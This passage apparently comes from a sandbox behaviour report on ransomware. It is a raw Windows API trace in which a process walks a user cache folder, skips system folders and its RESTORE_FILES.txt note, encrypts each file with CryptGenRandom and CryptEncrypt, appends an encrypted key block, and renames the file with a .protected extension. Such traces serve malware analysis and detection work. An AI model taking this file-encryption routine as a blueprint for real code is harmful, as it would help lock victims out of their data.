lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.933] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.934] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.934] CloseHandle (hObject=0x150) returned 1 [0088.934] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.protected") returned 162 [0088.934] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.protected")) returned 1 [0088.935] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.935] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="Windows") returned -1 [0088.935] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="Program Files") returned -1 [0088.935] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="Program Files (x86)") returned -1 [0088.935] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="$Recycle.bin") returned 1 [0088.935] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="System Volume Information") returned -1 [0088.935] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 152 [0088.935] StrStrIW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".protected") returned 0x0 [0088.935] lstrcmpW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="RESTORE_FILES.txt") returned -1 [0088.935] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.935] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.936] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 152 [0088.936] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".txt") returned 0x0 [0088.936] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 152 [0088.936] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".rar") returned 0x0 [0088.936] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 152 [0088.936] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".zip") returned 0x0 [0088.936] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0088.937] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.937] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0088.937] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.937] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.938] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.938] CloseHandle (hObject=0x150) returned 1 [0088.938] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.protected") returned 162 [0088.938] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.protected")) returned 1 [0088.939] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.939] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="Windows") returned -1 [0088.939] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="Program Files") returned -1 [0088.939] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="Program Files (x86)") returned -1 [0088.939] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="$Recycle.bin") returned 1 [0088.939] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="System Volume Information") returned -1 [0088.939] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 119 [0088.939] StrStrIW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".protected") returned 0x0 [0088.939] lstrcmpW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="RESTORE_FILES.txt") returned -1 [0088.939] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.939] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.939] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 119 [0088.939] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".txt") returned 0x0 [0088.940] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 119 [0088.940] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".rar") returned 0x0 [0088.940] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 119 [0088.940] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".zip") returned 0x0 [0088.940] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x10c, lpOverlapped=0x0) returned 1 [0088.940] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffef4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.941] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x10c, lpOverlapped=0x0) returned 1 [0088.941] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.941] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.941] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.941] CloseHandle (hObject=0x150) returned 1 [0088.941] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406.protected") returned 129 [0088.941] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406.protected")) returned 1 [0088.942] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.942] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="Windows") returned -1 [0088.942] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="Program Files") returned -1 [0088.942] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="Program Files (x86)") returned -1 [0088.942] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="$Recycle.bin") returned 1 [0088.942] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="System Volume Information") returned -1 [0088.942] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned 119 [0088.942] StrStrIW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".protected") returned 0x0 [0088.942] lstrcmpW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="RESTORE_FILES.txt") returned -1 [0088.942] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.942] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.943] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned 119 [0088.943] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".txt") returned 0x0 [0088.943] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned 119 [0088.943] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".rar") returned 0x0 [0088.943] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned 119 [0088.943] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".zip") returned 0x0 [0088.943] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x124, lpOverlapped=0x0) returned 1 [0088.944] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffedc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.944] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x124, lpOverlapped=0x0) returned 1 [0088.944] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.944] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.944] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.944] CloseHandle (hObject=0x150) returned 1 [0088.944] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D.protected") returned 129 [0088.944] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d.protected")) returned 1 [0088.945] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.945] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="Windows") returned -1 [0088.945] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="Program Files") returned -1 [0088.945] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="Program Files (x86)") returned -1 [0088.945] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="$Recycle.bin") returned 1 [0088.945] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="System Volume Information") returned -1 [0088.945] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned 119 [0088.945] StrStrIW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".protected") returned 0x0 [0088.945] lstrcmpW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="RESTORE_FILES.txt") returned -1 [0088.945] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.945] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.946] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned 119 [0088.946] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".txt") returned 0x0 [0088.946] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned 119 [0088.946] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".rar") returned 0x0 [0088.946] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned 119 [0088.946] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".zip") returned 0x0 [0088.946] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xdc, lpOverlapped=0x0) returned 1 [0088.947] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.947] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xdc, lpOverlapped=0x0) returned 1 [0088.947] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.947] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.947] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.947] CloseHandle (hObject=0x150) returned 1 [0088.947] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D.protected") returned 129 [0088.947] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d.protected")) returned 1 [0088.948] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.948] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="Windows") returned -1 [0088.948] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="Program Files") returned -1 [0088.948] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="Program Files (x86)") returned -1 [0088.948] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="$Recycle.bin") returned 1 [0088.948] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="System Volume Information") returned -1 [0088.948] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 152 [0088.948] StrStrIW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".protected") returned 0x0 [0088.948] lstrcmpW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="RESTORE_FILES.txt") returned -1 [0088.948] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.948] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 